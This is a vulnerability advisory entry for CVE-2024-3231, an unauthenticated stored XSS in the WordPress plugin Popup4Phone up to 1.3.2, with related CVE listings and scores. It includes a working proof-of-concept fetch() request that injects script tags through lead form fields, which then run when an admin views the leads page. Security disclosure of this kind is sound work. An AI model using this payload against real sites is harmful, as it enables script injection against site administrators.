Lucene search
Bob MatyasWPEX-ID:81DBB5C0-CCDD-4AF1-B2F2-71CB1B37FE93HistoryApr 26, 2024 - 12:00 a.m.
Popup4Phone <= 1.3.2 - Unauthenticated Stored XSS
2024-04-2600:00:00
Bob Matyas
33
popup4phone
unauthenticated
stored xss
poc
may 10 2024
update
exploit
Description The plugin does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against admins.
Run the following JavaScript in the browser console:
```
fetch("/", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "popup4phone%5Bws_pages_submit_url%5D=&popup4phone%5Bws_pages_submit_title%5D=Popup4Phone+%E2%80%93+WPScan+Vulnerability+Testbench&popup4phone%5Bname%5D=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&popup4phone%5Bphone%5D=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&popup4phone%5Bemail%5D=test%40example.com&popup4phone%5Bmessage%5D=test&ajax=1",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
```
After running the JavaScript, log in as an admin and browse to "Popup4Phone > Leads" and see the XSSRelated
cvelist
cvelist
CVE-2024-3231 Popup4Phone <= 1.3.2 - Unauthenticated Stored XSS
2024-05-17 06:00:02
vulnrichment
vulnrichment
CVE-2024-3231 Popup4Phone <= 1.3.2 - Unauthenticated Stored XSS
2024-05-17 06:00:02
cve
cve
CVE-2024-3231
2024-05-17 06:15:53
wpvulndb
wpvulndb
Popup4Phone <= 1.3.2 - Unauthenticated Stored XSS
2024-04-26 00:00:00
nvd
nvd
CVE-2024-3231
2024-05-17 06:15:53
wordfence
wordfence
6.2 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:81DBB5C0-CCDD-4AF1-B2F2-71CB1B37FE93